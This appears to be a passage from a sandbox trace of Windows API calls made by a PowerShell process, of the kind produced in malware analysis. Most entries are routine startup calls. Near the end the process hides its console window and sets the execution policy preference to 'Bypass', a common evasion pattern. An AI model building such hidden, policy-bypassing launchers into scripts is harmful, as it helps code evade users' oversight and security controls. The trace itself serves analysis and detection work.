	[0068.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xbd670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0069.603] CoTaskMemAlloc (cb=0x104) returned 0x2e4210
	[0069.603] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0069.603] CoTaskMemFree (pv=0x2e4210) 
	[0069.605] CoTaskMemAlloc (cb=0x104) returned 0x2e4210
	[0069.605] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0069.605] CoTaskMemFree (pv=0x2e4210) 
	[0069.946] CoTaskMemAlloc (cb=0x104) returned 0x2e4210
	[0069.946] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0069.946] CoTaskMemFree (pv=0x2e4210) 
	[0069.950] CoTaskMemAlloc (cb=0x104) returned 0x2e4210
	[0069.950] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0069.950] CoTaskMemFree (pv=0x2e4210) 
	[0069.951] CoTaskMemAlloc (cb=0x104) returned 0x2e4210
	[0069.951] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0069.951] CoTaskMemFree (pv=0x2e4210) 
	[0071.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xbd670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0071.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xbd670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0072.092] CoTaskMemAlloc (cb=0x104) returned 0x2e4210
	[0072.092] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0072.092] CoTaskMemFree (pv=0x2e4210) 
	[0072.995] CoTaskMemAlloc (cb=0x104) returned 0x2e4210
	[0072.995] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0072.995] CoTaskMemFree (pv=0x2e4210) 
	[0073.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0073.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0082.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xbd670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0082.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xbd670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0085.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0085.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xbd670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0088.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xbd670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0095.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xbd670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0095.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xbd670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0099.778] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0099.778] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0099.778] CoTaskMemFree (pv=0x2e4430) 
	[0099.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0099.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0099.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0100.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0104.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xbd790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0104.042] SetErrorMode (uMode=0x1) returned 0x1
	[0104.042] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xbda10 | out: lpFileInformation=0xbda10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0104.042] SetErrorMode (uMode=0x1) returned 0x1
	[0107.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.576] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0107.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0107.576] CoTaskMemFree (pv=0x2e4430) 
	[0107.580] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0107.580] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0107.580] CoTaskMemFree (pv=0x2e4430) 
	[0107.580] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0107.580] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0107.580] CoTaskMemFree (pv=0x2e4430) 
	[0107.584] CoCreateGuid (in: pguid=0xbddd8 | out: pguid=0xbddd8*(Data1=0x665e61f9, Data2=0xcf5d, Data3=0x4142, Data4=([0]=0x98, [1]=0x64, [2]=0xfd, [3]=0xa7, [4]=0x97, [5]=0x90, [6]=0xf1, [7]=0x99))) returned 0x0
	[0108.605] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0108.605] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.605] CoTaskMemFree (pv=0x2e4430) 
	[0108.608] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0108.608] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.608] CoTaskMemFree (pv=0x2e4430) 
	[0109.051] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0109.051] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.051] CoTaskMemFree (pv=0x2e4430) 
	[0109.057] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0109.058] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xbda80 | out: lpConsoleScreenBufferInfo=0xbda80) returned 1
	[0109.062] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0109.063] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xbda80 | out: lpConsoleScreenBufferInfo=0xbda80) returned 1
	[0109.063] GetVersionExW (in: lpVersionInformation=0xbda10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xbda10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0109.066] GetCurrentProcess () returned 0xffffffffffffffff
	[0109.067] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xbdaa8 | out: TokenHandle=0xbdaa8*=0x1d0) returned 1
	[0109.070] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xbd9c8 | out: TokenInformation=0x0, ReturnLength=0xbd9c8) returned 0
	[0109.071] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2f38c0
	[0109.071] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x8, TokenInformation=0x2f38c0, TokenInformationLength=0x4, ReturnLength=0xbd9c8 | out: TokenInformation=0x2f38c0, ReturnLength=0xbd9c8) returned 1
	[0109.072] DuplicateTokenEx (in: hExistingToken=0x1d0, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xbdb28 | out: phNewToken=0xbdb28*=0x1c8) returned 1
	[0109.072] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xbd9c8 | out: TokenInformation=0x0, ReturnLength=0xbd9c8) returned 0
	[0109.073] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2f3910
	[0109.073] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x8, TokenInformation=0x2f3910, TokenInformationLength=0x4, ReturnLength=0xbd9c8 | out: TokenInformation=0x2f3910, ReturnLength=0xbd9c8) returned 1
	[0109.073] CheckTokenMembership (in: TokenHandle=0x1c8, SidToCheck=0x2cfbd28*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xbdb38 | out: IsMember=0xbdb38) returned 1
	[0109.074] CloseHandle (hObject=0x1c8) returned 1
	[0109.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0109.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0109.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0109.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0136.634] GetConsoleWindow () returned 0x50228
	[0136.636] ShowWindow (hWnd=0x50228, nCmdShow=0) returned 0
	[0136.638] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0136.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0136.638] CoTaskMemFree (pv=0x2e4430) 
	[0136.810] SetEnvironmentVariableW (lpName="PSExecutionPolicyPreference", lpValue="Bypass") returned 1
	[0136.822] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2e4
	[0136.824] CoCreateGuid (in: pguid=0xbdc20 | out: pguid=0xbdc20*(Data1=0xb0991838, Data2=0xf2a1, Data3=0x4971, Data4=([0]=0xac, [1]=0x72, [2]=0x53, [3]=0x4, [4]=0xe7, [5]=0x18, [6]=0x8d, [7]=0xf6))) returned 0x0
	[0136.826] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0136.826] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0136.826] CoTaskMemFree (pv=0x2e4430) 
	[0141.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbcfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbcfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbcfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
